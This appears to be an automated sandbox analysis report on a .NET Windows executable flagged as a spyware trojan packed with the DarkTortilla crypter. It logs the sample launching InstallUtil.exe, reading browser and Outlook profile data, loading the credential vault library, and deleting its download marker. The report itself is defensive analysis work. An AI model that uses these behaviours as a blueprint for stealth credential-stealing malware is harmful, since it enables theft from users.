                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeCode function: 1_2_0742E1581_2_0742E158
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeCode function: 1_2_07428DB81_2_07428DB8
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeCode function: 1_2_074240801_2_07424080
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeCode function: 1_2_07422F701_2_07422F70
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeCode function: 1_2_07422F7C1_2_07422F7C
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeCode function: 1_2_07422F801_2_07422F80
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeCode function: 1_2_0742D7801_2_0742D780
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeCode function: 1_2_0742AE521_2_0742AE52
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeCode function: 1_2_0742AE5C1_2_0742AE5C
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeCode function: 1_2_0742CECF1_2_0742CECF
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeCode function: 1_2_0742BEE81_2_0742BEE8
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeCode function: 1_2_0742E1481_2_0742E148
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeCode function: 1_2_0742E1541_2_0742E154
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeCode function: 1_2_0742401E1_2_0742401E
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeCode function: 1_2_07B9AB581_2_07B9AB58
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeCode function: 1_2_07B94B501_2_07B94B50
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeCode function: 1_2_07B9C1D81_2_07B9C1D8
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeCode function: 1_2_07B96DC01_2_07B96DC0
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeCode function: 1_2_07B965681_2_07B96568
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeCode function: 1_2_07B9C4E01_2_07B9C4E0
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeCode function: 1_2_07B918201_2_07B91820
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeCode function: 1_2_07B98BB81_2_07B98BB8
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeCode function: 1_2_07B98BB41_2_07B98BB4
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeCode function: 1_2_07B98BA81_2_07B98BA8
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeCode function: 1_2_07B913FC1_2_07B913FC
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeCode function: 1_2_07B913F01_2_07B913F0
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeCode function: 1_2_07B923D01_2_07B923D0
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeCode function: 1_2_07B923C91_2_07B923C9
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeCode function: 1_2_07B923CC1_2_07B923CC
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeCode function: 1_2_07B90B201_2_07B90B20
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeCode function: 1_2_07B90B1C1_2_07B90B1C
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeCode function: 1_2_07B90B101_2_07B90B10
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeCode function: 1_2_07B9CB781_2_07B9CB78
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeCode function: 1_2_07B95B681_2_07B95B68
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeCode function: 1_2_07B95B641_2_07B95B64
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeCode function: 1_2_07B95B581_2_07B95B58
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeCode function: 1_2_07B94B4C1_2_07B94B4C
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeCode function: 1_2_07B94B401_2_07B94B40
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeCode function: 1_2_07B90E201_2_07B90E20
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeCode function: 1_2_07B90E101_2_07B90E10
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeCode function: 1_2_07B916781_2_07B91678
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeCode function: 1_2_07B916741_2_07B91674
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeCode function: 1_2_07B916681_2_07B91668
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeCode function: 1_2_07B911B91_2_07B911B9
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeCode function: 1_2_07B99DB01_2_07B99DB0
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeCode function: 1_2_07B96DB01_2_07B96DB0
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeCode function: 1_2_07B969D91_2_07B969D9
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeCode function: 1_2_07B911C81_2_07B911C8
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeCode function: 1_2_07B911C41_2_07B911C4
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeCode function: 1_2_07B9A5181_2_07B9A518
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeCode function: 1_2_07B965581_2_07B96558
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeCode function: 1_2_07B9003C1_2_07B9003C
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeCode function: 1_2_07B9181C1_2_07B9181C
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeCode function: 1_2_07B918101_2_07B91810
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeCode function: 1_2_07B914001_2_07B91400
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeCode function: 1_2_07B900061_2_07B90006
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeCode function: 1_2_07B900401_2_07B90040
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeCode function: 1_2_05E745351_2_05E74535
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_030B40F05_2_030B40F0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_030B4D085_2_030B4D08
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_030B44385_2_030B4438
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_06A396B05_2_06A396B0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_06A3A6F05_2_06A3A6F0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_06A333C85_2_06A333C8
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_06A360F85_2_06A360F8
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_06A3C0185_2_06A3C018
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_06A300405_2_06A30040
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_06A39E305_2_06A39E30
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_06A300075_2_06A30007
                        Source: tTXQS6DONV.exe, 00000001.00000002.2888881438.0000000003999000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTokenTableApp.dll> vs tTXQS6DONV.exe
                        Source: tTXQS6DONV.exe, 00000001.00000002.2879833948.000000000099E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs tTXQS6DONV.exe
                        Source: tTXQS6DONV.exe, 00000001.00000002.2892478097.0000000005070000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTokenTableApp.dll> vs tTXQS6DONV.exe
                        Source: tTXQS6DONV.exe, 00000001.00000002.2881532887.0000000002CE6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameccca13a5-9bf3-42e0-8638-f8842e08a063.exe4 vs tTXQS6DONV.exe
                        Source: tTXQS6DONV.exe, 00000001.00000002.2895167564.0000000007550000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameRP8SH.dll6 vs tTXQS6DONV.exe
                        Source: tTXQS6DONV.exe, 00000001.00000002.2888881438.0000000003BDF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameccca13a5-9bf3-42e0-8638-f8842e08a063.exe4 vs tTXQS6DONV.exe
                        Source: tTXQS6DONV.exe, 00000001.00000002.2888881438.0000000003BDF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTokenTableApp.dll> vs tTXQS6DONV.exe
                        Source: tTXQS6DONV.exe, 00000001.00000000.2164224100.0000000000F5E000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameyyy656.exe@ vs tTXQS6DONV.exe
                        Source: tTXQS6DONV.exe, 00000001.00000002.2888881438.0000000003B0E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameccca13a5-9bf3-42e0-8638-f8842e08a063.exe4 vs tTXQS6DONV.exe
                        Source: tTXQS6DONV.exeBinary or memory string: OriginalFilenameyyy656.exe@ vs tTXQS6DONV.exe
                        Source: tTXQS6DONV.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                        Source: tTXQS6DONV.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: tTXQS6DONV.exe, q4T5B.csCryptographic APIs: 'CreateDecryptor'
                        Source: 1.2.tTXQS6DONV.exe.3bdf172.3.raw.unpack, P.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 1.2.tTXQS6DONV.exe.3bdf172.3.raw.unpack, P.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                        Source: 1.2.tTXQS6DONV.exe.3bdf172.3.raw.unpack, P.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 1.2.tTXQS6DONV.exe.3bdf172.3.raw.unpack, P.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 1.2.tTXQS6DONV.exe.3bdf172.3.raw.unpack, N.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 1.2.tTXQS6DONV.exe.3bdf172.3.raw.unpack, N.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 1.2.tTXQS6DONV.exe.3bdf172.3.raw.unpack, N.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 1.2.tTXQS6DONV.exe.3bdf172.3.raw.unpack, N.csCryptographic APIs: 'TransformFinalBlock'
                        Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/4@1/1
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\tTXQS6DONV.exe.logJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMutant created: NULL
                        Source: tTXQS6DONV.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: tTXQS6DONV.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                        Source: tTXQS6DONV.exeReversingLabs: Detection: 68%
                        Source: unknownProcess created: C:\Users\user\Desktop\tTXQS6DONV.exe "C:\Users\user\Desktop\tTXQS6DONV.exe"
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeSection loaded: dwrite.dllJump to behavior
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeSection loaded: windowscodecs.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vaultcli.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasapi32.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasman.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rtutils.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc6.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ntmarta.dllJump to behavior
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                        Source: tTXQS6DONV.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                        Source: tTXQS6DONV.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                        Data Obfuscation

                        barindex
                        Yara detected DarkTortilla Crypter
                        Source: Yara matchFile source: 1.2.tTXQS6DONV.exe.5070000.6.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 1.2.tTXQS6DONV.exe.3c45470.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 1.2.tTXQS6DONV.exe.5070000.6.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 1.2.tTXQS6DONV.exe.3c45470.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 1.2.tTXQS6DONV.exe.3c09450.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 1.2.tTXQS6DONV.exe.3bdf172.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000001.00000002.2892478097.0000000005070000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000001.00000002.2888881438.0000000003999000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000001.00000002.2888881438.0000000003BDF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000001.00000002.2881532887.0000000002991000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: tTXQS6DONV.exe PID: 7036, type: MEMORYSTR
                        .NET source code contains method to dynamically call methods (often used by packers)
                        Source: tTXQS6DONV.exe, g2Z1Et.cs.Net Code: NewLateBinding.LateCall(obj7, (Type)null, "DynamicInvoke", new object[1] { new object[0] }, (string[])null, (Type[])null, (bool[])null, true)
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeCode function: 1_2_055AD44F push ecx; retf EFCDh1_2_055AD5BA
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeCode function: 1_2_05E7A1A9 push ecx; retf 0046h1_2_05E7A1CA
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeCode function: 1_2_05E7D07C pushad ; retf 1_2_05E7D0D5
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeCode function: 1_2_05E7BAE0 pushad ; ret 1_2_05E7BAF3
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeCode function: 1_2_05E7F21F push eax; iretd 1_2_05E7F22E
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeCode function: 1_2_07427733 push edi; ret 1_2_0742792E
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeCode function: 1_2_0742A3ED push ds; retf 0040h1_2_0742A43E
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeCode function: 1_2_0742793C push eax; ret 1_2_0742796D
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_030BD4B8 push es; ret 5_2_030BD4B0
                        Source: tTXQS6DONV.exeStatic PE information: section name: .text entropy: 7.181596373025786
                        Source: tTXQS6DONV.exe, g2Z1Et.csHigh entropy of concatenated method names: 'a0WFn', 'Sp46G', 's0S4Aw', 'Jt97Hy', 'Yg17Km', 'j9C7Sr', 'g3CQj6', 'c8G1C', 'i2KPx', 'Qw1r5'
                        Source: tTXQS6DONV.exe, d8KDc.csHigh entropy of concatenated method names: 'r4WRg', 'Fe1z2', 's7STr', 'a8LYz', 's5TXw', 'm3NZb', 'c3G7N', 'Se45Z', 'Xp86K', 'Pc95G'
                        Source: tTXQS6DONV.exe, Sn3m8.csHigh entropy of concatenated method names: 'a8MCs', 'i5K4R', 'Ld63Y', 'y6F7D', 'k8L7Y', 'Hc18S', 'Mk7i5', 'z9A0X', 'q2CXm', 'Xq93Y'
                        Source: tTXQS6DONV.exe, q4T5B.csHigh entropy of concatenated method names: 'Fx43M', 'Qk86B', 'Lp59P', 'Hm74L', 'Kj96Y', 'Ar78M', 'r7JZk', 'Qo7m6', 'Wg35G', 'r0S1N'

                        Hooking and other Techniques for Hiding and Protection

                        barindex
                        Hides that the sample has been downloaded from the Internet (zone.identifier)
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeFile opened: C:\Users\user\Desktop\tTXQS6DONV.exe\:Zone.Identifier read attributes | deleteJump to behavior
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
